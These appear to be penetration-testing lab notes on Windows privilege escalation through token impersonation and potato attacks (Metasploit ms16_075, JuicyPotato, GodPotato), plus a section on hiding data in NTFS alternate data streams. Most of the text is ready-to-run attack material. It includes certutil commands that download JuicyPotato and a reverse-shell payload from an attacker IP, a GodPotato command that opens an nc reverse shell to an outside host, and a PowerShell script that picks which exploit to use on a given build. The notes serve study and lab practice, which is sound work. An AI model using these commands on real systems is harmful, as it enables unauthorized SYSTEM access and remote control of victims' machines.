Impersonation and Potato Attacks

Token Impersonation Overview

Token impersonation explained

HTB Machine Jeeves

Potato Attack Overview

High level Overview from foxglovesecurity

Escalation via Potato Attack

After getting a meterpreter shell as the low-privileged user (the module needs SeImpersonatePrivilege in that session; check with getprivs first)

background
use exploit/windows/local/ms16_075_reflection
set SESSION 1         <-- the id shown when the first session was backgrounded
set LHOST tun0
set LPORT 1738        <-- a port different from the one the first shell called back on
exploit

Inside of the new meterpreter shell

load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"     <-- if the token is not matched, escape the backslash: "NT AUTHORITY\\SYSTEM"
shell
whoami

Manual Juicy Potato Attack

Needs SeImpersonatePrivilege (whoami /priv) and only works before Windows 10 1809 / Server 2019 (build 17763), where the OXID resolver redirection it relies on was fixed. The spool\drivers\color directory is used because every user can write to it. shell.exe is a reverse-shell payload; start its listener before running juicy.exe.

cd C:\Windows\System32\spool\drivers\color\
certutil.exe -urlcache -f http://10.9.209.91/JuicyPotato.exe juicy.exe
certutil.exe -urlcache -f http://10.9.209.91/shell.exe shell.exe
juicy.exe -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} -l 1337 -p "C:\Windows\System32\spool\drivers\color\shell.exe"

-t *   try both CreateProcessWithTokenW and CreateProcessAsUser
-c     CLSID of a COM server that runs as SYSTEM; it must be valid for the target OS version (the JuicyPotato repo has per-version lists, the one above is wmiApSrv)
-l     local port the fake COM server listens on, not the reverse-shell port; pick a free one
-p     program to launch as SYSTEM

GOD POTATO

Newer alternative for builds where JuicyPotato is patched; its README states support for Server 2012 through 2022. Still needs SeImpersonatePrivilege, and the binary must match the .NET runtime on the box (NET2 and NET4 builds are released).

.\godpotato.exe -cmd "cmd /c whoami"

.\godpotato.exe -cmd "C:\programdata\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.214 1338"     <-- nc -lvnp 1338 must already be listening on the attacker host
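Every potato variant above depends on two things that are worth checking before uploading any binary: the token must hold SeImpersonatePrivilege (or SeAssignPrimaryTokenPrivilege), and the OS build must be one the chosen tool still works on. The following PowerShell is an added example written for these notes, not code from JuicyPotato or GodPotato. It parses whoami /priv and reads the build number from the registry; the build threshold (17763, Windows 10 1809 / Server 2019) is taken from the JuicyPotato README, and the GodPotato range from its README. It assumes an English whoami, since the Enabled/Disabled strings are localized.

```powershell
# Added example (not from the original page): pre-flight check for potato attacks.
# 1. Which impersonation privileges does this token hold?
# 2. Which potato is usable on this build?
# Assumptions: English 'whoami' output; build 17763 as the JuicyPotato cut-off
# (OXID resolver fix in Windows 10 1809 / Server 2019).

function Get-ImpersonationPrivilege {
    # 'whoami /priv' prints one privilege per line: "<Name> <Description> <Enabled|Disabled>".
    # A privilege listed as Disabled is still usable: the tool enables it itself
    # with AdjustTokenPrivileges, it only has to be present in the token.
    $wanted = @('SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege')
    foreach ($line in (whoami /priv)) {
        foreach ($name in $wanted) {
            if ($line -match "^$name\s") {
                $state = 'Disabled'
                if ($line -match '\bEnabled\s*$') { $state = 'Enabled' }
                [pscustomobject]@{ Privilege = $name; State = $state }
            }
        }
    }
}

function Get-PotatoCandidate {
    $privs = @(Get-ImpersonationPrivilege)
    # The registry value is not affected by the version shims that can make
    # [Environment]::OSVersion lie to unmanifested processes.
    $build = [int](Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').CurrentBuildNumber

    if ($privs.Count -eq 0) {
        return "Build $build, no impersonation privilege: potato attacks will not work from this token"
    }
    $held = ($privs | ForEach-Object { "$($_.Privilege)=$($_.State)" }) -join ', '
    if ($build -lt 17763) {
        return "Build $build, $held: JuicyPotato (pick a CLSID valid for this build) or GodPotato"
    }
    return "Build $build, $held: JuicyPotato is patched on this build, use GodPotato"
}

Get-PotatoCandidate
```

Run it from the low-privileged shell you already have; a service account such as IIS APPPOOL or a SQL service user is the usual case where the privilege shows up and a potato is the fastest route to SYSTEM.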

Resources

Technical Overview
Other Version

Bonus

Alternate Data Streams

Alternate data streams (ADS) are an NTFS-only feature. Every file has an unnamed primary data stream, which is what type, editors and the size shown by dir report, and it may carry any number of extra named streams that dir and most tools ignore. That makes an ADS a simple place to hide data on a host; copying the file to a FAT/exFAT volume or most non-NTFS shares silently drops the extra streams. dir /r lists the streams, and cmd reads one through redirection (type cannot open a stream given as a plain argument):

dir /r
more < hm.txt:root.txt:$DATA
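To see the whole mechanism end to end rather than only the read side, here is an added PowerShell example (not part of the original notes) that plants a named stream on a throwaway file, enumerates the streams the way dir /r does, reads the hidden one back from both PowerShell and cmd, and removes it. The file and stream names are arbitrary choices.

```powershell
# Added example (not from the original page): create, list, read and remove an
# alternate data stream. Needs an NTFS volume ($env:TEMP normally is one).
Set-Location $env:TEMP
$file = 'ads-demo.txt'

Set-Content -Path $file -Value 'nothing to see here'
# Write a named stream; the size dir and Explorer show stays that of the primary stream
Set-Content -Path $file -Stream 'root.txt' -Value 'hidden-value'

# Enumerate streams: ':$DATA' is the unnamed primary stream, anything else is an ADS
Get-Item -Path $file -Stream * | Select-Object Stream, Length
# Same view from cmd, as used in the notes above
cmd /c "dir /r $file"

# Read the hidden stream: PowerShell addresses it by name, cmd needs redirection
Get-Content -Path $file -Stream 'root.txt'
cmd /c "more < ${file}:root.txt"

# Cleanup: removing the stream leaves the primary content untouched
Remove-Item -Path $file -Stream 'root.txt'
Remove-Item -Path $file
```

During triage the Get-Item -Stream * form is the one to sweep a directory with (Get-ChildItem -Recurse | Get-Item -Stream * ), since the Zone.Identifier stream that browsers add to downloads is normal and any other named stream deserves a look.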
